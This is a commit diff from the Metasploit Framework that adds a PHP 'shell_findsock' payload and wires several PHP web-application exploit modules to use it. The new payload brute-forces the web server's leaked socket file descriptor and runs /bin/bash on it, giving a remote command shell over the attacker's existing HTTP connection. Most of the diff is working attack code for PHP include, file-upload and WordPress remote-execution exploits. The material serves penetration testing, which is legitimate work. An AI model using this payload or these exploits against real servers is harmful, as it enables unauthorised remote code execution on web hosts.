initial commit of php findsock. This patch makes all http connections global and removes the "close if (!pipelining)" checks, so beware of bugs.

git-svn-id: file:///home/svn/framework3/trunk@5678 4d416f70-5f16-0410-b530-b9f4589650da

lib/msf/base/sessions/command_shell.rb

@@ -36,6 +36,10 @@ class CommandShell
 		"Command shell"
 	end
 
+	def run_cmd(cmd)
+		write_shell(cmd)
+		return rstream.get
+	end
 	#
 	# Calls the class method.
 	#
@@ -54,7 +58,12 @@ class CommandShell
 	# Read from the command shell.
 	#
 	def read_shell(length = nil)
-		return rstream.read(length)
+		if length.nil?
+			rv = rstream.get
+		else
+			rv = rstream.read(length)
+		end
+		return rv
 	end
 
 	#

lib/msf/core/exploit/http.rb

@@ -110,13 +110,15 @@ module Exploit::Remote::HttpClient
 		)
 
 		# If this connection is global, persist it
-		if (opts['global'])
+		# No reason for the socket not to be global and it allows findsock to
+		# work.
+		#if (opts['global'])
 			if (self.client)
 				disconnect
 			end
 
 			self.client = nclient 
-		end
+		#end
 	
 		return nclient
 	end

lib/msf/core/handler/find_port.rb

@@ -123,6 +123,8 @@ protected
 			Rex::ThreadSafe.sleep(1.5)
 		end
 
+		# Make sure the read buffer is empty before we test for a shell
+		sock.get_once(-1,1)
 		# Check to see if the shell exists
 		sock.put("\necho #{ebuf}\n")
 

lib/msf/core/module/author.rb

@@ -24,7 +24,8 @@ class Msf::Module::Author
 			'skylined'  => 'skylined' + 0x40.chr + 'edup.tudelft.nl',
 			'patrick'   => 'patrick' + 0x40.chr + 'aushack.com',
 			'ramon'     => 'ramon' + 0x40.chr + 'risesecurity.org',
-			'I)ruid'    => 'druid' +  0x40.chr + 'caughq.org'
+			'I)ruid'    => 'druid' +  0x40.chr + 'caughq.org',
+			'egypt'     => 'egypt' + 0x40.chr + 'metasploit.com'
 		}
 
 	#

lib/msf/core/session/interactive.rb

@@ -95,7 +95,14 @@ protected
 	# Check to see if the user wants to abort.
 	#
 	def _interrupt
-		user_want_abort?
+		begin
+			user_want_abort?
+		rescue Interrupt
+			# The user hit ctrl-c while we were handling a ctrl-c, send a
+			# literal ctrl-c to the shell.  XXX Doesn't actually work.
+			#$stdout.puts("\n[*] interrupted interrupt, sending literal ctrl-c\n")
+			#$stdout.puts(run_cmd("\x03"))
+		end
 	end
 
 	#

lib/rex/io/stream.rb

@@ -54,6 +54,7 @@ module Stream
 	# This method reads data of the supplied length from the stream.
 	#
 	def read(length = nil, opts = {})
+		# XXX handle length being nil
 		begin
 			fd.sysread(length)
 		rescue IOError

lib/rex/proto/http/client.rb

@@ -315,7 +315,7 @@ class Client
 		resp.max_data = config['read_max_data']
 
 		# Tell the remote side if we aren't pipelining
-		conn.shutdown(::Socket::SHUT_WR) if (!pipelining?)
+		#conn.shutdown(::Socket::SHUT_WR) if (!pipelining?)
 
 		# Wait at most t seconds for the full response to be read in.  We only
 		# do this if t was specified as a negative value indicating an infinite
@@ -369,15 +369,17 @@ class Client
 				end
 			rescue EOFError
 				return nil
+			rescue ::TimeoutError, ::Timeout::Error
+				#$stdout.puts("timeout\n")
 			end
 		} if (t)
 
 		# Close our side if we aren't pipelining
-		close if (!pipelining?)
+		#close if (!pipelining?)
 
 		# if the server said stop pipelining, we listen... 
 		if resp['Connection'] == 'close'
-			close
+			#close
 		end
 
 		# XXX - How should we handle this?

modules/exploits/unix/webapp/pajax_remote_exec.rb

@@ -43,6 +43,10 @@ class Exploits::Unix::Webapp::Pajax_Execute < Msf::Exploit::Remote
 			'Payload'        =>
 				{
 					'DisableNops' => true,
+					'Compat'      => 
+						{
+							'ConnectionType' => 'find',
+						},
 					'Space'       => 4000,
 				},
 			'Platform'       => 'php',

modules/exploits/unix/webapp/php_include.rb

@@ -26,7 +26,7 @@ class Exploits::Unix::Webapp::PHP_INCLUDE < Msf::Exploit::Remote
 			'Description'    => %q{
 				Exploits things like <?php include($_GET['path']); ?>
 			},
-			'Author'         => [ 'hdm' , 'egypt <egypt@nmt.edu>'],
+			'Author'         => [ 'hdm' , 'egypt' ],
 			'License'        => MSF_LICENSE,
 			'Version'        => '$Revision$',
 			'References'     =>
@@ -37,6 +37,13 @@ class Exploits::Unix::Webapp::PHP_INCLUDE < Msf::Exploit::Remote
 			'Payload'        =>
 				{
 					'DisableNops' => true,
+					'Compat'      => 
+						{
+							# By adding {'global' => true} to the connect
+							# options we get find shell compatibility for free
+							# in php exploits.
+							'ConnectionType' => 'find',
+						},
 					'Space'       => 32768,
 				},
 			'Platform'       => 'php',
@@ -57,8 +64,9 @@ class Exploits::Unix::Webapp::PHP_INCLUDE < Msf::Exploit::Remote
 		timeout = 0.01
 		uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.uri_encode(php_include_url))
 		print_status("Trying uri #{uri}")
-		response = send_request_raw({ 'uri' => uri },timeout)
+		response = send_request_raw({ 'global' => true, 'uri' => uri },timeout)
 
+		handler
 	end
 
 end

modules/exploits/unix/webapp/php_wordpress_lastpost.rb

@@ -42,6 +42,10 @@ class Exploits::Unix::Webapp::Wordpress_LastPost_Execution < Msf::Exploit::Remot
 			'Payload'        =>
 				{
 					'DisableNops' => true,
+					'Compat'      => 
+						{
+							'ConnectionType' => 'find',
+						},
 					'Space'       => 512,
 				},
 			'Platform'       => 'php',

modules/exploits/unix/webapp/sphpblog_file_upload.rb

@@ -45,6 +45,10 @@ class Exploits::Unix::Webapp::SPHPBlog_File_Upload < Msf::Exploit::Remote
 			'Payload'        =>
 				{
 					'DisableNops' => true,
+					'Compat'      => 
+						{
+							'ConnectionType' => 'find',
+						},
 					'Space'       => 1024,
 				},
 			'Platform'       => 'php',

modules/payloads/singles/php/shell_findsock.rb

@@ -0,0 +1,93 @@
+##
+# $Id: bind_php.rb 5546 2008-07-01 01:44:56Z egypt $
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+
+require 'msf/core'
+require 'msf/core/payload/php'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/core/handler/find_shell'
+
+module Msf
+module Payloads
+module Singles
+module Php
+
+module ShellFindsock
+
+	include Msf::Payload::Single
+	include Msf::Payload::Php
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'PHP Command Shell, Find Port',
+			'Version'       => '$Revision: 5546 $',
+			'Description'   => %Q{
+				Spawn a shell on the established connection to
+				the webserver.  Only tested on Apache but it 
+				might work on other web servers that leak file
+				descriptors to child processes.
+				},
+			'Author'        => [ 'egypt <egypt@metasploit.com>' ],
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'php',
+			'Handler'       => Msf::Handler::FindShell,
+			'Session'       => Msf::Sessions::CommandShell,
+			'Arch'          => ARCH_PHP
+			))
+	end
+
+	def php_findsock
+
+		#cmd = Rex::Text.encode_base64(datastore['CMD'])
+		dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
+		shell = <<END_OF_PHP_CODE
+error_reporting(E_ALL);
+print("<html><body>");
+flush();
+
+error_log("Looking for file descriptor");
+$fd = 13;
+for ($i = 3; $i < 50; $i++) {
+	$foo = system("/bin/bash 2>/dev/null <&$i -c 'echo $i'");
+	if ($foo != $i) {
+		$fd = $i - 1;
+		break;
+	}
+}
+error_log("Found it ($fd)");
+print("</body></html>\n\n");
+flush();
+
+$c = "/bin/bash <&$fd >&$fd 2>&$fd";
+system($c);
+
+END_OF_PHP_CODE
+
+#function mysystem(){
+#	#{php_preamble({:disabled_varname => dis})}
+#	#{php_system_block({:cmd_varname=>'$c', :disabled_varname => dis, :output_varname => '$out'})}
+#	return $out;
+#}
+		
+		return shell
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		return php_findsock
+	end
+
+end
+
+end end end end